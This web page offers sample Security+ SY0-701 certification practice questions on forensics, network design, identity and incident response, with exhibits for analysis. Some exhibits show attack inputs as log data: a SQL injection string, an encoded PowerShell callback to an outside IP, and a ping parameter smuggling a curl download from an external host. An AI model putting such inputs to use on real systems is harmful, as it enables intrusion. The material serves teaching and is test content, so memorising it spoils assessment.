Back to Security+ SY0-701

CompTIA exam questions

Security+ SY0-701 practice test

Practise questions on cloud computing concepts covering service models, deployment types, and essential characteristics for the SY0-701 exam.

1,152
practice questions
5
topics covered
SY0-701
exam code
CompTIA
vendor

Study modes

Three ways to study

Start with the Study Sheet to learn the material, switch to Practice Tests for active recall, then take a Mock Exam to simulate the real thing.

Study Sheet

All 1,152 questions with correct answers and explanations already visible. Read at your own pace — no time pressure.

Start reading →

Practice Test

Answer first, then see feedback and explanation. Tracks your score per session. Best for active recall and identifying weak areas.

Mock Exam

Full timed simulation with countdown. Answers hidden until the end. Includes all question types just like the real exam.

Start mock exam →

Study Sheet

All 1,152 SY0-701 questions with answers

Every question in the bank, paginated 75 per page. Correct answers and full explanations are revealed upfront — ideal for first-pass learning and pre-exam review.

16 pages · 75 questions per page · 1,152 total

Domain practice

Study SY0-701 by domain

Each domain has its own study sheet and practice test. Target the areas where you're weakest instead of repeating questions you already know.

All domains with question counts →

Related practice questions

Study SY0-701 by topic

Topic pages go deep on individual concepts — each one covers a specific exam topic with questions, explanations, and study notes.

Courseiva uses original exam-style practice questions created for learning and revision. The goal is to understand the concepts, recognise exam patterns, and improve through explanations — not memorise copied exam dumps. Learn the difference →

Sample questions

Security+ SY0-701 practice questions

Start practice test

An HR analyst must send a salary file to an external auditor. The auditor only needs names, departments, and salary totals, not Social Security numbers or bank account details. Which two actions should the analyst take first? Select two.

An investigator receives a suspect laptop drive that may be used in court. Which approach best supports a forensically sound image while protecting the original media?

An investigator must collect data from a suspected insider-threat laptop so the evidence could be used in an HR and legal review. Which action best preserves admissibility?

Question 4mediummultiple choice
Read the full DNS explanation →

An NDR tool shows a production web server sending small, periodic DNS queries to random-looking subdomains under a domain the company does not use. The pattern repeats every 60 seconds, even when normal web traffic is idle. What is the best interpretation and next step?

An investigator needs to make a forensic image of a suspect laptop without changing the original drive contents. Which two practices should be used? Select two.

An operations team manages Linux servers over SSH. The security team wants to stop direct management access from employee laptops, reduce lateral movement if one admin endpoint is compromised, and keep a log of every administrative session. Which two design choices best fit? Select two.

An investigator needs a copy of a suspect laptop drive for analysis without changing the original media. What should be used?

Question 8mediummultiple choice
Read the full wireless explanation →

An organization is redesigning its office network. Guest Wi-Fi must reach the internet only, employee laptops need access to internal apps, and a payment-processing system must be separated from general user traffic but still reach one database server. Which design best meets these requirements?

An online retailer is redesigning its public web application so the web server can receive internet traffic, the application server can only be reached by the web tier, and the database server can only be reached by the application tier. Which placement best supports this design?

An order-entry application must survive a single server failure and continue serving users if the primary site becomes unavailable. Management wants automatic failover, but does not want to pay for fully active production capacity in two regions. Which design is best?

Based on the exhibit, what is the best handling decision for the requested file?

Exhibit

Data request:
File: customer_export.csv
Contents: full name, street address, SSN last 4, account balance, support notes
Requestor: external troubleshooting contractor

Policy excerpt:
- Internal: company staff only
- Confidential: encrypt in transit, approved recipients only
- Restricted: minimize, mask where possible, owner approval required, time-limited access, logged sharing
- Public: may be shared externally without restriction

An organization is evaluating a payroll SaaS provider after the procurement team asks for evidence that the vendor's security controls were designed and operating effectively during the past year. Which document should the security team review first?

Question 13hardmultiple choice
Read the full VPN explanation →

Based on the exhibit, what additional control is the best fit?

Current controls on the finance share: - SMB signing enabled - Weekly access review - Nightly backups to immutable storage - Antivirus scans at 02:00

Incident: a valid VPN account was used to access 40,000 files in 8 minutes and copy them to a local drive. Goal: detect unauthorized bulk access quickly before exfiltration completes.

Exhibit

Current controls on the finance share:
- SMB signing enabled
- Weekly access review
- Nightly backups to immutable storage
- Antivirus scans at 02:00

Incident: a valid VPN account was used to access 40,000 files in 8 minutes and copy them to a local drive.
Goal: detect unauthorized bulk access quickly before exfiltration completes.

Based on the exhibit, what is the best next control to prevent noncompliant mobile devices from accessing corporate email while still allowing IT to wipe company data from lost phones?

Exhibit

MDM dashboard excerpt:
- iOS device compliance: 84%
- Android device compliance: 79%
- Email app access policy: Allow if credentials are valid
- Noncompliance reasons: outdated OS, no passcode, jailbreak/root indicators
- Lost device action: Full factory reset only

Security request:
Block risky devices from email access and protect employee personal data on BYOD devices.

Based on the exhibit, what is the best response to the facilities manager's request?

Exhibit

Corporate privacy notice excerpt:
- Employee home addresses, personal phone numbers, and emergency contacts are collected for payroll, benefits, tax reporting, and emergency notification only.
- Access is limited to HR and Payroll unless a privacy review approves another purpose.

Ticket:
- Facilities manager requests an export of all employee home addresses and personal phone numbers to mail holiday gifts and parking passes.
Question 16easymultiple choice
Read the full NAT/PAT explanation →

Before applying a major patch to a virtual machine, the administrator wants a quick way to return the VM to its exact pre-change state if the patch fails. What should the administrator create?

Based on the exhibit, what is the best immediate action for the SOC or IR team?

A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.

Exhibit

Host: finance-lap07
10:22:11  winword.exe spawned powershell.exe -enc <redacted>
10:22:14  powershell.exe created C:\Users\ana\AppData\Roaming\rclone.exe
10:24:02  file rename activity: 184 files changed to *.locked
10:24:09  outbound SMB connections to 10.20.4.18 and 10.20.4.19
10:25:01  EDR status: endpoint still connected to corporate VPN
User report: 'My shared files stopped opening and the folder names changed.'

Based on the exhibit, what type of web attack is most likely taking place?

Exhibit

Web application log excerpt:

Request: GET /search?q=acme' OR '1'='1'-- HTTP/1.1
Response: 500 Internal Server Error
Database log: syntax error near "OR" at line 1
Developer note: the search feature appends user input directly into the SQL query string without parameterization.

During a disaster recovery test, what is the most important thing to confirm about the backup?

Question 20easymultiple choice
Read the full wireless explanation →

Based on the exhibit, what wireless threat is most likely occurring?

Exhibit

Wireless scan from the lobby:
SSID: CorpWiFi       BSSID: 18:AA:10:22:44:60  Signal: -78 dBm
SSID: CorpWiFi       BSSID: 7C:22:90:11:33:AA  Signal: -41 dBm
SSID: CorpGuest      BSSID: 18:AA:10:22:44:61  Signal: -79 dBm
User report: "My tablet connected to CorpWiFi automatically, then a sign-in page appeared that looked different from our normal one."

Based on the exhibit, which integration best lets the SaaS application trust the company's existing identity provider so users can sign in with their corporate credentials?

Exhibit

SaaS sign-in settings:
- Local accounts: Enabled
- SAML SSO: Disabled
- SCIM provisioning: Disabled
- Password synchronization: Disabled
Requirement: users from the acquired subsidiary must use their existing corporate identities without separate SaaS passwords.

Based on the exhibit, what should the analyst do next to limit the impact of the suspected compromise?

Exhibit

EDR Alert Summary
Host: FIN-LT-22
Severity: High
Detection: Suspicious PowerShell with encoded command
Parent Process: winword.exe
Network Activity: outbound connection to 203.0.113.77:4444
User Note: 'The laptop is running very slowly and pop-ups started after opening an attachment.'

Based on the exhibit, which change would most improve the security of the stored password data?

Exhibit

Database sample

users.password_hash
--------------------------------
alex   5f4dcc3b5aa765d61d8327deb882cf99
mira   202cb962ac59075b964b07152d234b70
sam    098f6bcd4621d373cade4e832627b4f6

Developer note:
- Passwords are hashed before storage
- The application does not currently store any salt values

Based on the exhibit, what is the BEST remediation for the application flaw shown?

A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.

Exhibit

Application log excerpt:
15:08:02 POST /tools/pingHost host=10.0.0.15
15:08:02 Application executed: /bin/sh -c "ping -c 1 10.0.0.15"
15:09:11 POST /tools/pingHost host=10.0.0.15;curl%20http://198.51.100.55/s
15:09:11 Application executed: /bin/sh -c "ping -c 1 10.0.0.15;curl http://198.51.100.55/s"
15:09:12 Outbound HTTPS session established to 198.51.100.55

Question Discussion

Share a tip, memory trick, or ask about the reasoning behind this question. Do not post real exam questions, leaked content, braindumps, or copyrighted exam material. Comments are moderated and may be removed without notice.

Loading comments…

Sign in to join the discussion.

Exam question guide

How to use these SY0-701 questions

Use these questions as active recall, not passive reading. Try the question first, review the answer choices, then open the explanation and connect the result back to the exam topic.

Quick answer

Tests understanding of cloud service models, deployment types, and characteristics like scalability and elasticity.

IaaS, PaaS, SaaS service model definitions and use cases

Public, private, hybrid cloud deployment distinctions

Key cloud characteristics: on-demand, broad network access

Metered usage and resource pooling concepts

These SY0-701 practice questions are part of Courseiva's free CompTIA certification practice question bank. Courseiva provides original exam-style SY0-701 questions with detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics.